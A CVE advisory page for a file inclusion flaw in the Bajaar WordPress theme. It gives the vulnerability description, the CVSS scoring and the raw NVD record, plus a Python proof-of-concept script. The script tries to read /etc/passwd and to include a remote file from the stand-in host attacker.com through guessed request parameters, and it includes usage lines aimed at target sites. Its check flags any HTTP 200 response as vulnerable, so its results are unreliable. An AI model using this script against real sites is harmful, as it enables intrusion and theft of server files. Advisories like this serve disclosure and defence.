Security Vulnerability Report
中文
CVE-2025-69004 CVSS 8.1 HIGH

CVE-2025-69004

Published: 2026-01-22 17:16:16
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in XpeedStudio Bajaar - Highly Customizable WooCommerce WordPress Theme bajaar allows PHP Local File Inclusion.This issue affects Bajaar - Highly Customizable WooCommerce WordPress Theme: from n/a through <= 2.1.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

XpeedStudio Bajaar WordPress Theme <= 2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69004 PoC - Bajaar Theme LFI/RFI # Target: WordPress site using Bajaar theme <= 2.1.0 import requests import argparse from urllib.parse import quote def test_lfi(target_url, file_path='/etc/passwd'): """Test Local File Inclusion vulnerability""" # Common vulnerable parameter patterns params = { 'theme': file_path, 'file': file_path, 'page': file_path, 'template': file_path } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Testing LFI on: {target_url}") print(f"[*] Target file: {file_path}") for param, value in params.items(): try: response = requests.get( target_url, params={param: value}, headers=headers, timeout=10, verify=False ) if 'root:' in response.text or response.status_code == 200: print(f"[+] Vulnerable! Parameter '{param}' accepts file inclusion") print(f"[+] Response preview:\n{response.text[:500]}") return True except Exception as e: print(f"[-] Error testing {param}: {e}") return False def test_rfi(target_url, attacker_server='http://attacker.com/malicious.txt'): """Test Remote File Inclusion vulnerability""" params = { 'theme': attacker_server, 'file': attacker_server, 'page': attacker_server, 'template': attacker_server } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"\n[*] Testing RFI on: {target_url}") print(f"[*] Attacker server: {attacker_server}") for param, value in params.items(): try: response = requests.get( target_url, params={param: value}, headers=headers, timeout=10, verify=False ) if response.status_code == 200: print(f"[+] Potentially vulnerable to RFI via parameter '{param}'") except Exception as e: print(f"[-] Error testing {param}: {e}") def main(): parser = argparse.ArgumentParser(description='CVE-2025-69004 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-f', '--file', default='/etc/passwd', help='File to read (LFI)') parser.add_argument('--rfi', action='store_true', help='Test RFI') args = parser.parse_args() # Test LFI test_lfi(args.url, args.file) # Test RFI if requested if args.rfi: test_rfi(args.url) if __name__ == '__main__': main() # Usage: # python cve-2025-69004.py -u http://target.com/wp-content/themes/bajaar/ # python cve-2025-69004.py -u http://target.com -f /etc/passwd # python cve-2025-69004.py -u http://target.com --rfi

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69004", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:16.210", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in XpeedStudio Bajaar - Highly Customizable WooCommerce WordPress Theme bajaar allows PHP Local File Inclusion.This issue affects Bajaar - Highly Customizable WooCommerce WordPress Theme: from n/a through <= 2.1.0."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en programa PHP (vulnerabilidad de 'inclusión remota de ficheros PHP') en XpeedStudio Bajaar - Tema de WordPress WooCommerce Altamente Personalizable bajaar permite la inclusión local de ficheros PHP. Este problema afecta a Bajaar - Tema de WordPress WooCommerce Altamente Personalizable: desde n/a hasta &lt;= 2.1.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/bajaar/vulnerability/wordpress-bajaar-highly-customizable-woocommerce-wordpress-theme-theme-2-1-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}